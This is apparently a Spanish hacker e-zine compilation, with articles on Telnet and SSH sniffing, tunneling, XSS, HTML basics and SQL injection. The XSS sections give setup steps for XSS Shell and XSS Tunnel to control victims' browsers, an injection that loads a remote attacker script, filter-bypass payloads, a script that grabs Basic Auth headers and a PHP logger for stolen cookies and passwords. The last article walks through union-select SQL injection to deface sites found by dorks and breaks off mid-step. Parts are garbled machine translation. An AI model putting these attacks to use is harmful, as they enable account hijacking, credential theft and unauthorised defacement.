acceder a otra maquina (servidor) para hacer uso remoto de esta. Es decir para
hacer manejo de la maquina como si nosotros estuviramos delante de ella.
Esto nos da el potencial de poder usar los recursos de esta maquina
(procesador o RAM ) sin levantarnos de la silla en el stano de nuestra madre

Las direcciones TELNET tienen el formato conocido por todos de la forma


algo.host.ext o una simple IP XXX.XXX.XXX.XXX acompaada de un nmero al
final que indica el puerto, por defecto el 23.

Ejemplo:

locis.loc.gov 23

2009.85.171.100 23

Cmo usar Telnet?

Casi todos los sistemas operativos tiene un cliente Telnet nativo /* Digo casi
todos por que me acabo de dar cuenta que Windows Vista no contiene el fichero
telnet.exe en System32, increible pero cierto, antenselo para recordar las
Micropend%#@$ de Win. Vista */

En todo caso clientes Telnet sobran y el mejor ejemplo es el Putty, el cual se


puede encontrar con facilidad en la tiendita de la esquina ;).

Continuando, conectarse mediante Telnet no es complicado ni necesitas saber


muchos comandos, solo dar un ejemplo ya que esto solo pretende ser un
breviario cultural para iniciar.
Abriendo una pagina web desde consola de windows.

C:\> Telnet /*Ejecutamos el cliente*/

Telnet: \>open 198.87.182.161 23

Connected to ejemplo.gov
Escape character is '^]'.

En este ejemplo solo pedimos abrir la direccin 198.87.182.161 en el puerto 23


mediante el comando open, despus nos arroja el mensaje de conectado y nos
dice que el carcter de escape (salida) es ^.

Hasta ahora todo bonito, podemos conectarnos a servidores con unos cuantos
comandos y disfrutar de la consola todo sin salir de casa, pero entonces Cul
es el problema?, y la respuesta que siempre escuchamos: La seguridad.

Telnet abri las pertas a toda una gama de posibilidades desde usuarios que
solo pretendan conectarse a la biblioteca del congreso hasta algunos mal
vivientes que descubrieron la cantidad de datos importantes que viajaban en la
red sin ningn tipo de proteccin.

Ese era un gran problema ya que aunque guardaras muy bien tu contrasea de
40 caracteres, despus que esa informacin sala de tu ordenador, cualquier
persona que se encontrara sniffeando el trfico de tu red poda leer en texto
plano toda tu actividad.

Fue entonces cuando en 1995 Tatu Ylnen propuso la primera versin del
protocolo ahora conocido como SSH.

Secure Sh ell
Shell

SSH (Secure Shell) trabaja de forma similar a como se hace con Telnet. La
diferencia principal es que SSH usa tcnicas de cifrado que hacen que la
informacin que viaja por el medio de comunicacin vaya de manera no legible y
ninguna tercera persona pueda descubrir el usuario y contrasea de la
conexin ni lo que se escribe durante toda la sesin.

Esto represento una gran defensa (aunque no detuvo) a ataques del tipo MITM
(Man in the Middle), ARP spoofing, etc., haciendo que el problema de la
seguridad ahora dependiera de algoritmos matemticos de encriptacin
abriendo ahora nuevos problemas para el atacante en turno.

Secure Shell desde el punto de vista del atacante


Ahora vamos a tomar el punto de vista del atacante y veremos como se ve una
comunicacin cifrada por el protocolo SSH. Espiaremos una comunicacin
primero sin usar ningn tipo de proteccin y despus con un cliente SSH.

Para esto escog el Wicked-Evil Sniffer

Y el Open SSH

http://www.openssh.com/

Primero dejamos nuestro sniffer escuchando todos los paquetes TCP nuestra
propia red. Y nos loggearemos a una cuenta de Messenger usando un servicio
en lnea como ebbudy o la que gusten y analizaremos el trafico.

Terminando de loggearnos checamos el Logg file que se crea al marcar la


casilla de Enable Loggining, y busquemos entre sus entraas.
Despus de buscar un rato en los paquetes TCP, nos encontramos con una linda
cookie que crea ebuddy al loggearnos.

Como vern esta mi mail tan claro como el agua (el cual es falso jiji) y un lindo
hash con la contrasea, que por lo menos ahora viajan en hash, en el primer
Messenger que saco Yahoo no hacia ni eso

Esto no aclara el hecho que es importante que nadie pueda husmear en la


campo data de nuestros paquetes, digo es como si mandaras cartas y cualquier
cartero pervertido pudiera ver lo que dice sin ningn inconveniente.

Ahora hagamos lo mismo pero usaremos el putty para conectarnos a un


servidor SMTP usando el Secure Shell.

En este caso se ve algo as:

TCP Header:
Source Port . . . . . . . 80
Dest Port . . . . . . . . -13376
Acknowledgement Number . 1142514760
Sequence Number . . . . . 570272387
Urgent Pointer . . . . . 0
Flags
ACK
PSH
Windows . . . . . . . . . 15
Checksum . . . . . . . . 39849
Data:
$^ 9o/*x{ &## hs N | Zf#]VS'( t {$8%Se^
2A1cX \? jUhv HID g'

Aqu esta en texto plano.


En Hexadecimal se ve algo as:

Observando uno de los paquetes nos damos cuenta que el campo data no es
comprensible ya que esta encriptado, lo cual pone mas difcil las cosas,
dependiendo del cliente/servidor la comunicacin estar encriptada en RSA de
64,128, 256 o hasta 1024bits.

Ms informacin en:

http://www.openssh.com/

http://www.balug.org.ar/ssh.html

Autor : The JokeR

Agradecimientos a Kairoz por su paciencia


XSS TUNELING
Introduccin al Tunneling
Introducci

Que es el tunneling?

El tunneling consiste en encapsular un protocolo de red sobre otro (protocolo


de red encapsulador) creando un tnel dentro de una red de computadoras. El
establecimiento de dicho tnel se implementa incluyendo una PDU determinada
dentro de otra PDU con el objetivo de transmitirla desde un extremo al otro del
tnel sin que sea necesaria una interpretacin intermedia de la PDU
encapsulada. De esta manera se encaminan los paquetes de datos sobre nodos
intermedios que son incapaces de ver en claro el contenido de dichos paquetes.
El tnel queda definido por los puntos extremos y el protocolo de comunicacin
empleado, que entre otros, podra ser SSH.

El uso de esta tcnica persigue diferentes objetivos, dependiendo del problema


que se est tratando, como por ejemplo la comunicacin de islas en escenarios
multicast, la redireccin de trfico, etc.

Uno de los ejemplos ms claros de utilizacin de esta tcnica consiste en la


redireccin de trfico en escenarios IP Mvil. En escenarios de IP mvil, cuando
un nodo-mvil no se encuentra en su red base, necesita que su home-agent
realice ciertas funciones en su puesto, entre las que se encuentra la de capturar
el trfico dirigido al nodo-mvil y redirigirlo hacia l. Esa redireccin del trfico
se realiza usando un mecanismo de tunneling, ya que es necesario que los
paquetes conserven su estructura y contenido originales (direccin IP de origen
y destino, puertos, etc.) cuando sean recibidos por el nodo-mvil.

El Tunneling se basa en tres protocolos

1. El protocolo del Carrier


Es el protocolo usado por la red que esta transportando la informacin
2. En protocolo del encapsulamiento (empaquetamiento)
Es el protocolo que aplica al envoltorio del paquete enviado, y segn el
tipo ser ms o menos seguro, pudiendo ser GRE, IPSec, L2F, PPTP,
L2TP, ... Siendo el IPSec el ms seguro entre los populares.
3. El protocolo pasajero
Es el protocolo del paquete de informacin que se enva dentro del
envoltorio, es decir, el paquete original de informacin. Los "protocolos
pasajero" habituales son IPX, NetBeui e IP.
El Tunneling tiene implicaciones muy importantes para las VPNs. Por ejemplo,
usted puede enviar un paquete que utiliza un protocolo no soportado por
Internet (por ejemplo el NetBeui de Microsoft) envuelto por un paquete IP que si
puede ser enviado por Internet. Tambin puede enviar un paquete destinado a
una IP de una red privada (no perteneciente a Internet y por tanto no localizable)
envuelto por un paquete IP con una direccin pblica que si encontrar su
destino en Internet.

En un tnel de una VPN de punto-a-punto, GRE (Generic Routing Encapsulation)


ser el protocolo de encapsulamiento ms habitual, a fin de poder pasar un
paquete de cualquier protocolo nativo envuelto en un paquete IP enviable por
Internet. Esto incluye informacin de que tipo de paquete se est encapsulando
e informacin de la conexin entre el cliente y el servidor.

Si se precisa seguridad avanzada, en vez de GRE se utilizar IPSec en modo


Tnel siendo un protocolo de encapsulamiento seguro tanto en conexiones que
unen oficinas como en conexiones de un usuario a una oficina porque adems
de encriptar la informacin es eficiente autentificando los usuarios.

En accesos de un usuario a una oficina, es muy habitual encontrar PPP. El PPP


es parte del TCP/IP, que se usa bsicamente para encapsular el protocolo del
paquete original en uno transportable por Internet.

La siguiente lista de protocolos se ha creado basndose en el PPP:


bas

L2F (Layer 2 Forwarding)


Desarrollado por Cisco, L2F utilizara cualquier esquema de
autentificacin soportado por el PPP
PPTP (Point.to.Point Tunneling Protocol)
El PPTP fue creado por el foro PPTP, un consorcio de empresas lderes en
comunicaciones que soporta encriptaciones de 40 y de 128 bits y
cualquiera de los sistemas de autentificacin del PPP
L2TP (Layer 2 Tunneling Protocol)
L2TP es el producto de la cooperacin entre varios miembros del foro
PPTP, y combina las prestaciones del PPTP y el L2TP as como el IPSec.

El L2TP puede ser usado como un protocolo de Tnel tanto para VPNs de unin
de delegaciones (redes de delegaciones) como para el acceso de usuarios
remotos, de hecho, el L2TP puede usarse entre :

El cliente y el router
Entre el NAS y el router
Entre un router y otro

CROSS-SITE SCRIPTING (XSS)


XSS es un ataque basado en la explotacin de vulnerabilidades del sistema de
validacin de HTML incrustado

Para ms informacin

http://rapidshare.com/files/179568239/XSS_by_Max_p0wer.doc

XSS TUNNELING

Para comprender XSS TUNNEL y cmo funciona, debe en primer lugar


entender lo que es y cmo funciona.

Qu es un canal XSS?
Qu

XSS es un canal interactivo de un canal de comunicacin entre dos sistemas


que es abierto por un ataque XSS. A nivel tcnico, es un tipo de AJAX
solicitud que pueden obtener los comandos, enviar respuestas atrs y es capaz
de hablar
entre dominios.

Qu es la xss Shell?
Qu

XSS Shell es una herramienta que puede ser usado para configurar un canal
XSS entre una vctima
y un atacante para que un atacante pueda controlar el navegador de la vctima
mediante el envo de
comandos. Esta comunicacin es bidireccional.

Para obtener el XSS Shell a trabajar a un atacante tiene que inyectar el XSS
Shell de JavaScript
de referencia por medio de un ataque XSS. El atacante es capaz de controlar la
vctima
navegador. Despus de este punto, el atacante puede ver las peticiones, las
respuestas y es capaz de
encargar el navegador de la vctima para llevar adelante las peticiones etc.

Un ataque de inyeccin de la muestra se muestra a continuacin;


http://foro.level-23.org/q = "> <script src = "http://xssshellserver/xssshell.asp">
</ script>

Cmo funciona la xss Shell?


XSS Shell es una aplicacin que consta de tres partes principales.

En primer lugar, el lado del servidor es parte de la Shell coordina el XSS XSS
Shell entre un
agresor y la vctima. Es una aplicacin del lado del servidor y requiere un ASP y
IIS
servidor Web. Utiliza una base de datos de MS Access como de almacenamiento.

La segunda parte de la herramienta es el lado del cliente y por escrito en


JavaScript. Esto carga en el
El navegador de la vctima y se encarga de la recepcin y el tratamiento de los
comandos
junto con proporcionar el canal entre la vctima y el agresor. Este cdigo

La parte final de la XSS Shell es la interfaz de administracin. Un atacante puede


enviar
nuevos comandos y recibir las respuestas de una vctima (s) de forma
instantnea desde el navegador
esta interfaz. Una vez ms, es ASP y requiere IIS.
Todos los pasos siguientes no esperar el uno para el otro y estn
constantemente buscando respuestas y
solicitudes dentro de los retrasos de tiempo especificado.

1. Un atacante infecta una pgina Web con una persistente o reflejado (temporal)
de XSS
pide que ataque XSS Shell remoto JavaScript.
2. La vctima sigue un enlace o visiten la pgina y ejecuta el cdigo JavaScript
en
ese dominio.
3. El navegador de la vctima comienza a realizar peticiones al peridico XSS
Shell
Servidor y busca nuevos comandos.
4. Cuando la vctima recibe un nuevo navegador como comando (Obtener
cookies,
Ejecutar JavaScript personalizado, Obtener clave de registro de datos etc.), es
procesada y
devuelve los resultados a la XSS Shell.
5. El atacante puede llevar a nuevos comandos vctima (s) de navegador y ver
los
resultados XSS Shell de la interfaz de administracin.

Por qu es mejor que el cl


qu clsico Ataque XSS?

Un atacante tendra ms de un disparo. Despus de controlar una vctima (s)


navegador el atacante es capaz de decidir su siguiente movimiento sobre la
base de las respuestas y
el entorno actual.
Le permite pasar por alto la siguiente;
o restricciones de propiedad intelectual,
o bsica / NTLM o autenticacin basado similares autenticaciones.
Dado que es la intencin de enviar de alerta (0wned!") A miles de vctimas y
construir una botnet temporal XSS potencia!

Qu es XSS tneles?
Qu
XSS de tneles es el tnel de trfico HTTP a travs de un canal a usar XSS
prcticamente cualquier aplicacin que admita proxies HTTP.
Qu es XSS tnel?
XSS tnel es el Proxy HTTP estndar que se sienta en un sistema del atacante.
Cualquier herramienta
que est configurado para utilizar el tnel que su trfico a travs del canal
activo en XSS
el XSS Shell servidor. XSS convierte el tnel de la solicitud y responde
transparente para validar las respuestas de HTTP y XSS Shell solicitudes.

XSS tnel est escrito en. NET y requiere. NET Framework para trabajar. Se
trata de una licencia GPL
Solicitud de licencia de cdigo abierto.

Beneficios de XSS tneles


Se permite el uso de prcticamente todas las herramientas que soportan
proxies HTTP!
Es posible utilizar herramientas automatizadas como Nikto, Inyectores SQL,
HTTP bruta
forcer contra la propiedad intelectual de las zonas restringidas de la Web,
Permite la configuracin de su navegador locales para utilizar el tnel y XSS
navegar por la pgina Web con una vctima de los poderes de su propio
navegador, y
no implica el uso de cualquier tipo de cookie complicado / IP / agente de usuario
basado en los controles,
Es muy bueno para demostrar el resultado de un ataque XSS.

Cmo Trabaja el XSS Tnel?

1. XSS El tnel conecta a un determinado XSS Shell y obtiene el actual


Identificador activo (a la vctima a ser controlado)
2. El local de cliente HTTP (navegador, etc. Nikto) enva peticiones HTTP al XSS
Tnel
o El Tnel XSS convierte peticiones HTTP en el que pide la
XSS Shell pueda comprender y procesar. A continuacin, enva las solicitudes al
XSS Shell Server.
XSS Shell o El servidor guarda esta peticin a su base de datos (Todas estas
solicitudes de trabajo slo para una determinada vctima por el tnel de XSS.
Este ID
puede verse en el salpicadero del tnel XSS).
3. El XSS Shell Cliente (que reside en JavaScript en el navegador de la vctima)
realiza peridicamente las solicitudes de XSS Shell Server y para los nuevos
controles
comandos para el proceso.

Este proceso requiere entre dominios leer. XSS Shell utiliza el mando a distancia
JavaScript para eludir la carga del mismo origen, la poltica de restricciones.
O Si hay nuevos comandos, que las cargas y los procesos y enva el
las respuestas (puede ser simplemente un cdigo de confirmacin o el cdigo
fuente de un
pgina o un archivo binario) para XSS Shell servidor.

Ejecutar comandos y respuestas en una moda multihilo.


4. XSS en el tnel de la cach local, el control de la XSS Shell Server para una
respuesta para
previamente asignados solicitudes. Si hay una respuesta que convierte a la
respuesta
vlida la respuesta HTTP y la enva a la aplicacin cliente.

Por defecto, el tnel de XSS cachs JavaScript, CSS y archivos de imagen para
una mejor
rendimiento. Esto es realmente necesario si se utiliza el XSS tnel con un
navegador. Si
pidi a los recursos ya est en la cach XSS tnel y se puede
obtenidos de la memoria cach local y enviado a la aplicacin cliente.

Almacenamiento en cach se puede desactivar la cach o se pueden gestionar


desde la interfaz de usuario
de XSS Tnel.
Un proceso de ataque
1. XSS Shell configurar el servidor,
2. XSS configurar el tnel para utilizar el servidor de XSS Shell,
3. Preparar el ataque XSS (someterse a un sitio Web vulnerables o enviar un
enlace
etc.),
4. XSS lanzar el tnel y esperar a que una vctima,
5. Configurar la herramienta o el navegador para utilizar el tnel de XSS,
6. Cuando vea vctima XSS en el tnel, de comenzar a utilizar su navegador /
herramienta
dirigidos para el dominio.

Como ejecutar lo aprendido?

Necesitamos:

1 nuestra xss Shell y tnnel la podemos descargar directamente de


http://rapidshare.de/files/43005148/xssshell-xsstunnell.rar.html

Un hosting que soporte asp como por ejemplo http://www.7host.com

Una vez extrados el rar tenemos las carpetas con la Shell y el tunnel
Procederemos a configurar nuestra Shell

En Server config colocaremos el link de nuestro Host

En el ejemplo seria http://free.7host05.com/level23

Una vez cambiado procedemos a guardar.

Ahora vamos a la carpeta admin. Y procederemos a modificar el database file


editamos el archivo de db.asp

Donde dice database configuration hay un enlace C:\XSS Shell\XSSShell-


060\db\shell.mdb este enlace deber ser cambiado por la direccin de nuestro
hosting pero como saber cual enlace es pues abriremos un block de notas y
escribiremos lo siguiente

<%
Response.Write Server.MapPath(".")

%>

La guardamos como test.asp y lo subimos al hosting

Luego abrimos la direccin y encontraremos un a direccin cpienla

Y remplazaremos la direccin C:\XSS Shell\XSSShell-060


Shell\XSSShell-060\db\shell.mdb

por la dada en nuestro hosting quedara as

E:\user1\level23\db\shell.mdb

Una vez tenemos todo configurado subimos todos los archivos y carpetas de

nuestra shell

Ya subido los archivos procederemos a entre a nuestra shell

http://free.7host05.com/level23/admin/Default.asp
la contrasea por defecto es w00t pero puede ser cambiada en el archivo
db.asp

ya tendremos nuestra shell montada


Ahora primero provaremos nuestra shell ingrasamos a la carpeta sample_victim
para provar si funciona nuestra shell. Nuestro ejemplo sera
http://free.7host05.com/level23/sample_victim/

Les debera aparecer esta pagina

Antes expliare en que consiste vemos el codigo de fuente encontraremos esto

ese es el codigo malicioso


que inyectamos con xss ahora vemos que hay que configurar el ejemplo.

Vamos a la carpeta sample_victim en nuestro pc y modificamos el archivo


default.asp, buscamos nuestro codigo malisioso y lo cambiamos por nuestra
shell en nuestro caso es http://free.7host05.com/level23/xssshell.asp

Guardamos los cambios y remplazamos los archivos del host

Volvemos abrir el link de sample victim

Y veremos que en nuestra shell se esta haciendo nuestro tunnel


Ya vemos que nuestro tunel sirve ahora vamos a configurar nuestro xss tunel

Abrimos nuestro xsstunel.exe

En options colocaremos la direccin de nuestra shell y el password y testeamos


si nos conecta con el server

Ahora iniciaremos el xss tunel y nos conectara con la shell


Ahora debemos configurar nuestro Proxy para nuestro tunel entramos a
iexplorer herramientas- opciones de internet->conexiones en el buton

configuracin lan

Seleccionaremos en servidor proxy y dejaremos como esta en la imagen Y ya


tenemos nuestra shell y el xsstunel.

frozenfew
Autor : Max p0wer frozenfew
Introduccin a XSS
Introducci
XSS es un ataque basado en la explotacion de vulnerabilidades del sistema de
validacion de HTML incrustado. Su nombre, del ingles Cross Site Scripting, y
renombrado XSS para que no sea confundido con las hojas de estilo en cascada
(CSS), originalmente abarcaba cualquier
ataque que permitiera ejecutar codigo de scripting, como VBScript o
javascript, en el contexto de otro dominio. Recientemente se acostumbra a
llamar a los ataques de XSS HTML Injection, sin embargo el termino correcto
es XSS. Estos errores se pueden encontrar en cualquier aplicacion HTML, no se
limita a sitios web, ya que puede haber aplicaciones locales vulnerables a XSS,
o incluso el navegador en si-. El problema esta en que normalmente no se
validan correctamente los datos de entrada que son usados en cierta aplicacion.
Esta vulnerabilidad puede estar presente de forma directa (foros, mensajes de
error, comentarios) o indirecta (redirecciones, framesets). Cada una se trata de
forma diferente.

* Directa: Este tipo de XSS es el que normalmente es censurado; asi- que es


muy poco comun que puedas usar tags como <script> o <iframe>

* Indirecta: Esta es un tipo de vulnerabilidad, muy comun y muy poco


explotada. Consiste en modificar valores que la aplicacion web utiliza para
pasar variables entre dos paginas, sin usar sesiones.

Indirecta

Sucede cuando hay un mensaje o una ruta en la URL del navegador o en una
cookie. Para saber el contenido de una cookie, sin usar ningun tipo de iecv o
addin para tu navegador, puedes usar el siguiente script de jasildbg. Solo
coloca TODO lo que esta en color negro en la barra de direcciones, y presiona
Enter.

javascript:for(var g in document.cookie.split
(';'))void(prompt("Valor de cookie "+document.cookie.split
(';')[g].split
(=')[0],document.cookie.split(;')[g].split(=')[1]));alert
(Cookies:\n+document.cookie.replace(/;/,\r\n));

Una vez dentro se puede modificar la cookie a tu antojo. Si pones cancelar la


cookie se borrara.

Que podemos ver con este ejemplo? Que podemos meter comandos javascript
solo modificando una URL.
Usando FrameSets
Regresemos al ejemplo del frameset, que segun la pagina que coloques te crea
un frame a esa pagina. Que pasara si pones en esa URL?

javascript:while(1)alert("level-23.org!");

Y el enlace lo pone un intruso hacia un foro. Un navegador incauto, va a verlo y


dira, bueno, es del mismo dominio, no puede ser nada malo.. y de resultado
tendra un loop infinito.

Hasta ahi- llegan los newbies. Pero vamos a ponernos en la piel de un experto.
Se trata de colocar un script que tome tu cookie, y mande un mp al
administrador, o incluso, que borre todos los mensajes de un foro.

El robo de cookies es lo mas basico, y tiene como objetivo robar la cookie. Y


eso de que sirve? Tengo el PHPSESSID, y si el usuario cierra sesion no sirve de
nada.

Cierto, pero con el uso de la libreria cURL un usuario malintencionado, podria al


recibir tu cookie, entrar a la pagina, y dejarla en cache, para que el atacante
cuando quiera, pueda entrar como tu, sin siquiera necesitar tu contrasea.

Otro uso comun para estas vulnerabilidades es lograr hacer phishing; o colocar
un exploit.

Quiere ello decir que tu ves la barra de direcciones, y ves que estas en una
pagina, pero realmente estas en otra. Introduces tu contrasea y la fastidiaste.

Lo peor son los sitios de descarga, que colocan en la misma URL el sitio de
objetivo. Esas paginas web son vulnerables a ataques XSS indirectos. O sea que
un intruso puede colocar una imagen con enlace al sitio malicioso, y se ejecuta,
sin que el usuario lo sepa.
Mensaje personalizado

La tecnica solo funciona con imagenes:

error.php?error=Usuario%20Invalido

Esa pagina es vulnerable a XSS indirecto.

Un <script> que cree otra sesion bajo otro usuario y tu sesion actual la mande al
atacante (lo explicado de cURL mas arriba), puede causar estragos.

Este codigo (muy peligroso) borra todo el contenido de la pagina en cuestion, y


escribe otra cosa:

<script> document.documentElement.innerHTML="NADA";</script>
Directa

Funciona localizando puntos debiles en la programacion de los filtros. Asi que si,
por ejemplo, logran quitar los <iframe>, <script>, el atacante siempre puede
poner un <div> malicioso, o incluso un <u> o <s>. Tags que casi siempre estan
permitidos.
Ejemplos de Scripts donde no son comunes de encontrar

<BR SIZE="&{alert('level-23')}">

<FK STYLE="behavior: url(http://tusitio/xss.htc);">

<DIV STYLE="background-image: url(javascript:alert('e-zine'))">

Usar estilos es increiblemente facil, y lo malo es que muchos filtros son


vulnerables. Se puede crear un DIV con background-image:
url(javascript:eval(this.fu)) como estilo y aadir al DIV un campo llamado fu que
contenga el codigo a ejecutar, como por ejemplo alert(anti-emo):

<div fu="alert('anti-emo');"

STYLE="background-image: url(javascript:eval(this.fu))">

Ajax

Este es un tipo de XSS no tan conocido, pero peligroso. Se basa en usar


cualquier tipo de vulnerabilidad para introducir un objeto XMLHTTP y usarlo
para enviar contenido POST, GET, sin conocimiento del usuario.

El siguiente script de ejemplo obtiene el valor de las cabeceras de autenticacion


de un sistema basado en Autenticacion Basica (Basic Auth). Solo falta
decodificarlo, pero es mas facil mandarlo codificado al registro de contraseas.
La codificacion es base64.
Script para obtener credenciales en tipo BASIC

Esta tecnica tambien es llamada XST Cross Site Tracing XST

var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");

// para firefox,

es: var xmlhttp = new XMLHttpRequest();

xmlhttp.open("TRACE","./",false);xmlhttp.send(null);
str1=xmlhttp.responseText;

splitString = str1.split("Authorization: Basic ");

str2=splitString[1];

str3=str2.match(/.*/)[0];

alert(str3);

Por cuestiones de seguridad.. Firefox y IExplorer 7 no permiten usar el metodo


TRACE.
log.php para registrar cookies

<?php$archivo = fopen('log2.htm','a');

$cookie = $_GET['c'];$usuario = $_GET['id'];

$ip = getenv ('REMOTE_ADDR');

$re = $HTTPREFERRER;

$fecha=date("j F, Y, g:i a");

fwrite($archivo, '<hr>USUARIO Y PASSWORD:


'.htmlentities(base64_decode($usuario)));

fwrite($archivo, '<br>Cookie: '.htmlentities($cookie).'<br>Pagina:


'.htmlentities($re));

fwrite($archivo, '<br> IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');

fclose($archivo);

?>

frozenfew
Autor : Max p0wer frozenfew
Curso Bsico de Programaci
Programacin en
HTML y CSS
CONTENIDO

Introduccin al lenguaje HTML

Que se necesita para hacer una pgina web

Composicin del lenguaje

Estructura bsica de un sitio web

Encabezados

Prrafos en HTML

Saltos de lnea

Lneas Horizontales

Insertar imgenes en HTML

Atributo ALT

Uso de la etiqueta <a>

Hipervnculos a un lugar del mismo documento

Los Textos y sus atributos

Etiqueta <Font>

Listas en HTML

Comentarios en HTML

Creacin de tablas en HTML

Formularios en HTML

Cajas de texto

Propiedades de las cajas de texto y atributos

Botones

Cajas de seleccin

Introduccin a CSS
Que es CSS

Formas de usar CSS en un documento HTML

Comentarios en CSS

INTRODUCCIN AL LENGUAJE HTML


INTRODUCCI

HTML (HyperText Markup Language), es un lenguaje para escribir pginas web,


extremadamente fcil de aprender, ya que trabaja con etiquetas que procesan laos
diferentes mdulos o componentes de un sitio web, estas etiquetas contienen los
llamados atributos, que son los que hacen que el aspecto del modulo cambie.

Que se necesita para hacer una pgina web?

Para crear un sitio web en HTML necesitamos de un editor podemos decir que el editor
ms fcil de conseguir es un editor de texto, en Windows se puede usar el notepad
notepad,
pero para facilitar las tareas podemos usar editores avanzados como lo son:

Microsoft Office FrontPage

Adobe Dreamweaver

Este ltimo es bastante recomendado ya que posee caractersticas que ayudan en el


manejo, desarrollo y personalizacin del sitio web.

Composici
Composici n del lenguaje

HTML es un lenguaje como ya hemos dicho que trabaja con etiquetas y atributos la
forma correcta de escribir una etiqueta es:

<etiqueta> Aqu va el texto </etiqueta>

Como se observa primer abrimos un psicoparentesis (< >) y lo cerramos dentro de


estos va la etiqueta y por ultimo se utiliza la misma etiqueta para cerrar o finalizar pero
esta vez con un / que indica el final de esta etiqueta.

Estructura bsica de un sitio web


Bien para indicar la estructura bsica de un sitio web debemos casi siempre utilizar
esta lnea de etiquetas:

<html>
<head>
<title> </title>
</head>
<body>

</body>
</html>

Explicacin:

Etiqueta Explicacin
<html> Indica el inicio de
un nuevo
documento html
<head> Indica la cabecera
del documento
<title> All se coloca el
titulo del
documento
<body> Despus de la
etiqueta body va
todo el resto de la
pgina web
imgenes texto etc.

Encabezados

Los encabezados son los ttulos de cada pgina dentro del documento, existen varios
niveles de encabezados:

<h1> Encabezado
<h2> Encabezado
<h3> Encabezado
<h4> Encabezado
<h5> Encabezado
<h6> Encabezado

Prrafos en HTML
Bueno existen varias formas de crear espacios entre nuestros textos pero la forma
correcta de hacerlo es separar todo con prrafos, para ellos utilizamos la etiqueta <p>

<p> esto es un prrafo de prueba </p>

<p> Esto es otro prrafo </p>

Y si hacen la prueba vern que entre etiqueta hay espacios que separan los prrafos.

Saltos de lnea

Muchas veces queremos separar alguna oracin o alguna lnea de texto o algn objeto
que se encuentre en nuestra pgina para eso usamos los saltos de lnea y la siguiente
etiqueta al final de cada texto:

<br>

Lineas horizontales

Bueno una lnea horizontal como ya su nombre lo indica es una llinea que separa la
pgina para insertarla debes usar esta etiqueta:

<hr>

Insertar imgenes en HTML


im

Para insertar una imagen usamos la etiqueta <img>

Para insertar una imagen esta debe estar en la misma carpeta para usarlo de esta
forma o escribir la ruta:

src=ruta.gif
<img src= ruta.gif></img>

Atributo ALT

Generalmente muestra un Tooltip cuando se pone el curso en un link es decir inserta


como un texto descriptivo su modo de uso es el siguiente:

<img src=imagen.gif alt=texto descriptivo></img>

Uso de la etiqueta <a>

Bueno la etiqueta <a> sirve para referirse a un link o una url, pero no funciona sola,
debe tener ciertos atributos, por ejemplo:

<a href=http://level-23.org> Texto </a>

Hipervnculos a un lugar del mismo documento


Hiperv
Esto es a lo que llamamos anclas, con ellas puedes hacer que un link vaya a cierto lugar
de un documento, la forma de hacerlo es sencilla:

<a name=nombreancla>Texto o titulo</a>

Y para hacer un link que vaya directamente a ese lugar del documento sencillamente:

<a href=#nombreancla>Texto o titulo </a>

Noten que para llamar el ancla usamos el smbolo #.

Autor : Ghost
Manual Inyeccion Sql
Hola, soy eDeex_. Creo que ya muchos me conocen, y hoy os voy a explicar
sobre Deface, en concreto SQL injecction, y he decidido SQL injecction, por qu
es lo mas fcil de aprender, y por que la mayora de las vulnerabilidades son
SQL.

& bueno, empecemos...

Qu es Deface?

El Deface / Defacing / Defacement es la modificacin de una pgina web sin


autorizacin del dueo de la misma.

La mayora de las veces logran defacear un sitio consiguiendo acceso mediante


alguna vulnerabilidad que el programador haya dejado en el mismo.
Tambin por passwords dbiles, problemas en el FTP, etc.

Qu es SQL Inyeccin?

Inyeccin SQL es una vulnerabilidad informtica en el nivel de la validacin de


las entradas a la base de datos de una aplicacin. El origen es el filtrado
incorrecto de las variables utilizadas en las partes del programa con cdigo
SQL. Es, de hecho, un error de una clase ms general de vulnerabilidades que
puede ocurrir en cualquier lenguaje de programacin o de script que est
incrustado dentro de otro.

Qu es un Dork?

Algo que usuarios malvolos escriben para encontrar mquinas vulnerables


Bueno ara vamos a la prctica, hoy, os voy a ensear a como defacear una
website mediante un bug SQL.

Primero hay que tener un buen dorks SQL, por ejemplo.

allinurl: .php?id=

Sin las comillas. Ese Dork es el ms bsico pero hay muchsimos ms, todo es
con tal de ir mirando.

Bueno ya hemos encontrado una, www.web.com/noticia.php?id=34

Ahora para saber si es vulnerable, le tenemos que quitar el 34, y ponerle .


Quedara a si:
www.web.com/noticias.php?id=

Si nos sale un error mysql , tipo este ;

Warning: mysql_error(): supplied argument is not a valid MySQL-Link resource


in /usr/home/xxxX/public_html/_sys/general_functions.php on line 5

No todos son as, pero tienen algo parecido. Bueno ya sabemos que es
vulnerable ara toca poner inyeccin. Lo principal es;

-1+union+all+select+0,1

Quedara as ;
www.web.com/noticias.php?id=-1+union+all+select+0,1

Ara toca ir buscando, hasta que se te quite los errores, y te salgan nmeros.
Para ir buscando tienes que ir aadiendo nmeros , ejemplo:

www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,4,5,6,7--

Siempre al final de cada numero pon -- [Dos guiones] sin las comillas.

No siempre acaba en 7, puede acabar en 100, 200, quien sabe.

A m, me ha salido los nmeros en 7, y me ha tirado el 4, 6 y 7.

Ahora toca coger uno de ellos, el que sea, yo cojo el 4.

Ara tenemos que hacer lo siguiente:

Si as elegido el 4, borras el numero 4 y pones table_name sin las comillas y al


final pones;

+from+information_schema.tables

Y nos quedara a si:


www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables

Ahora se nos ha cambiado el 4 por CHARACTER_SETS. Que es lo que normal


mente sale al principio. Ara nos toca buscar tablas como admin, root, login,
miembro, member, user, usuario, administrador, etc. Y aviso, no es lo mismo
admin que Admin. Me explico, a lo mejor con admin no te sale y con Admin s.
Para buscar las tablas tienes que borrar los dos guiones finales y poner ;

+1,1--

Y ir cambiando el primer 1 por los siguientes nmeros, ejemplo:

www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+
1,1--

www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+
2,1--

www.web.com/noticias.php?id=-
1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+
3,1--

A si hasta que te salga algo importante. Nunca suele pasar de 100 pero bueno,
nunca se sabe.

A m me ha tirado la tabla admin en 17. Ahora vamos hacer lo siguiente:

Borras +information_schema.tables+3,1-- , quedara a si:

